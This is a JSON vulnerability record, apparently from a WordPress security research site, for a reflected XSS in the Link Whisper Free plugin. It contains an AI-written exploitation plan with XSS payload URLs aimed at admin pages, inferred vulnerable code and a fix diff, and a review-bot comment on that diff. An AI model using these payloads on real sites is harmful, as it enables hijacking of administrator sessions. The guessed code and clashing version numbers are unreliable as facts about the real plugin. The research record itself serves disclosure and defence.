[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faAu17Uo3wezfl-RltTjTaNbj2Cw0G0PPiBqMwU7OGt8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-22357","link-whisper-free-reflected-cross-site-scripting-4","Link Whisper Free \u003C= 0.9.2 - Reflected Cross-Site Scripting","The Link Whisper Free plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 0.9.2 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","link-whisper",null,"\u003C=0.9.2","0.9.3","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-16 00:00:00","2026-05-04 14:39:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd47f7f24-2938-4af6-93b8-1aefb41bbae2?source=api-prod",78,[],"researched",false,3,"This research plan targets **CVE-2026-22357**, a reflected Cross-Site Scripting (XSS) vulnerability in the **Link Whisper Free** plugin (versions \u003C= 0.9.0). \n\nSince specific source files were not provided in the prompt, this plan is based on a structural analysis of the Link Whisper Free plugin's administrative interface and typical reflected XSS patterns in WordPress reporting tools.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the Link Whisper Free plugin reflects user-controlled input from URL parameters back into the HTML response of the administrative dashboard without sufficient sanitization (e.g., `sanitize_text_field`) or context-aware output escaping (e.g., `esc_html` or `esc_attr`). An attacker can craft a malicious link that, when clicked by a logged-in administrator, executes arbitrary JavaScript in the context of the admin's session.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Vulnerable Page (Slug):** `link-whisper` or `link-whisper-report` (inferred).\n*   **HTTP Parameter:** `keyword`, `category`, or `s` (inferred). 
Reflected XSS often targets search\u002Ffilter strings in reporting plugins.\n*   **Authentication Level:** Requires an active session of a user with access to the Link Whisper dashboard (typically **Administrator**).\n*   **Precondition:** The victim must be logged into WordPress and click the attacker-supplied URL.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The administrator visits a URL like `wp-admin\u002Fadmin.php?page=link-whisper-report&keyword=\u003Cscript>alert(1)\u003C\u002Fscript>`.\n2.  **Hook Registration:** The plugin registers the admin menu via `add_menu_page` or `add_submenu_page` in a core initialization file (likely `LinkWhisper.php` or `core\u002FWpApp.php`).\n3.  **Controller Execution:** The callback function for the menu slug (e.g., `WpApp::show_report()`) is triggered.\n4.  **View Rendering:** The controller retrieves the `keyword` parameter directly from `$_GET['keyword']` to filter the internal link reports.\n5.  **Sink:** The plugin includes a view file (e.g., `views\u002Freport.php`) which echoes the search term back to the user to indicate what is being filtered:\n    ```php\n    \u002F\u002F Inferred vulnerable code in view file\n    echo '\u003Ch2>Search results for: ' . $_GET['keyword'] . '\u003C\u002Fh2>';\n    ```\n6.  **XSS:** Since `$_GET['keyword']` is not wrapped in `esc_html()`, the script executes.\n\n### 4. Nonce Acquisition Strategy\nReflected XSS in `GET` parameters for administrative pages typically does not require a nonce for the reflection to occur, as the page is designed to render based on URL state. However, if the plugin performs an action (like a search) that is nonce-protected, the script might still be reflected in the error or result message even if the nonce check fails.\n\n**Strategy for Extraction (if needed):**\n1.  **Identify Script Localization:** Link Whisper often localizes data via `wp_localize_script`.\n2.  
**Creation:** Create a page that triggers Link Whisper's scripts if they aren't global.\n    *   `wp post create --post_type=page --post_status=publish --post_content='[link_whisper_suggestion_test]'` (inferred shortcode).\n3.  **Extraction:**\n    *   Navigate to the created page.\n    *   `browser_eval(\"window.wp_link_whisper?.nonce\")` (inferred JS variable).\n\n*Note: For this reflected XSS, we likely do not need a nonce to trigger the sink, as we are targeting the page rendering logic.*\n\n### 5. Exploitation Strategy\n\n#### Step 1: Identify the Vulnerable Parameter\nWe will probe the common reporting parameters used by Link Whisper.\n\n**Request 1 (Probing):**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=link-whisper-report&keyword=XSS_PROBE_KEYWORD`\n*   **Method:** `GET`\n*   **Tool:** `http_request` (with admin cookies)\n*   **Check:** Look for `XSS_PROBE_KEYWORD` in the response body.\n\n#### Step 2: Deliver Payload\nIf the parameter is reflected, we inject the script.\n\n**Request 2 (Exploit):**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=link-whisper-report&keyword=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n*   **Method:** `GET`\n*   **Tool:** `http_request` (simulating a victim clicking the link)\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure Link Whisper Free 0.9.0 is active.\n2.  **Generate Content:** Create 5-10 posts so the \"Link Report\" page has data to display\u002Ffilter.\n    *   `wp post generate --count=10`\n3.  **User Session:** Ensure the automated agent is using an **Administrator** cookie session for the `http_request`.\n\n### 7. 
Expected Results\n*   The HTTP response body will contain the raw string: `...search results for: \u003Cscript>alert(document.domain)\u003C\u002Fscript>...`.\n*   The script tag will NOT be escaped (e.g., not `&lt;script&gt;`).\n*   When viewed in a browser via `browser_navigate`, an alert box should appear.\n\n### 8. Verification Steps\n1.  **HTML Inspection:** Use `http_request` and search the output for the unescaped payload.\n    ```bash\n    # Example logic for the agent\n    response = http_request(\"...&keyword=\u003Cscript>alert(1)\u003C\u002Fscript>\")\n    if \"\u003Cscript>alert(1)\u003C\u002Fscript>\" in response.body:\n        print(\"Vulnerability Confirmed: Unescaped reflection found.\")\n    ```\n2.  **Browser Confirmation:** Use `browser_navigate` to the exploit URL and check for an execution artifact (like a console log or alert).\n\n### 9. Alternative Approaches\nIf the `keyword` parameter is sanitized, test these alternatives:\n*   **`order_by`:** `admin.php?page=link-whisper-report&order_by=title\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n*   **`category`:** `admin.php?page=link-whisper-report&category=\u003Cimg src=x onerror=alert(1)>`\n*   **`msg`:** Many plugins use a `msg` or `message` parameter to display admin notices: `admin.php?page=link-whisper&msg=\u003Cscript>alert(1)\u003C\u002Fscript>`","The Link Whisper Free plugin for WordPress (\u003C= 0.9.0) is vulnerable to Reflected Cross-Site Scripting because it echoes user-controlled URL parameters, such as 'keyword', back into the administrative interface without proper output escaping. 
An attacker can exploit this by tricking a logged-in administrator into clicking a crafted link, leading to the execution of arbitrary JavaScript in the victim's session.","\u002F\u002F Inferred vulnerable code based on research plan analysis of the reporting interface\n\u002F\u002F File: views\u002Freport.php (or similar controller rendering the search result string)\necho '\u003Ch2>Search results for: ' . $_GET['keyword'] . '\u003C\u002Fh2>';","--- views\u002Freport.php\n+++ views\u002Freport.php\n@@ -1,1 +1,1 @@\n-echo '\u003Ch2>Search results for: ' . $_GET['keyword'] . '\u003C\u002Fh2>';\n+echo '\u003Ch2>Search results for: ' . esc_html($_GET['keyword']) . '\u003C\u002Fh2>';","The exploit targets the Link Whisper reporting dashboard, typically located at \u002Fwp-admin\u002Fadmin.php?page=link-whisper-report. An attacker crafts a URL containing a malicious script payload in the 'keyword' GET parameter, such as \u002Fwp-admin\u002Fadmin.php?page=link-whisper-report&keyword=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E. The attacker then tricks an authenticated administrator into clicking this link. Because the plugin reflects the 'keyword' parameter into the HTML output without using WordPress escaping functions like esc_html(), the browser executes the script in the context of the administrative session.","gemini-3-flash-preview","2026-04-20 21:56:25","2026-04-20 21:56:49",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","0.9.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flink-whisper\u002Ftags\u002F0.9.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flink-whisper.0.9.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flink-whisper\u002Ftags"]
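Review bot: on the `+` line of the views/report.php hunk in `research_fix_diff`, `$_GET['keyword']` is still read directly inside the `echo`, with no `isset()` check and no `wp_unslash()` before `esc_html()`. A request that omits the parameter will raise an undefined-index notice, and a quoted search term will be displayed with the backslashes WordPress adds to request data. Suggest reading the value once, for example `$keyword = isset( $_GET['keyword'] ) ? sanitize_text_field( wp_unslash( $_GET['keyword'] ) ) : '';`, and then echoing `esc_html( $keyword )`. The record labels the vulnerable line as inferred and lists no patch diff files, so this hunk should be confirmed against the real 0.9.3 change before it is relied on.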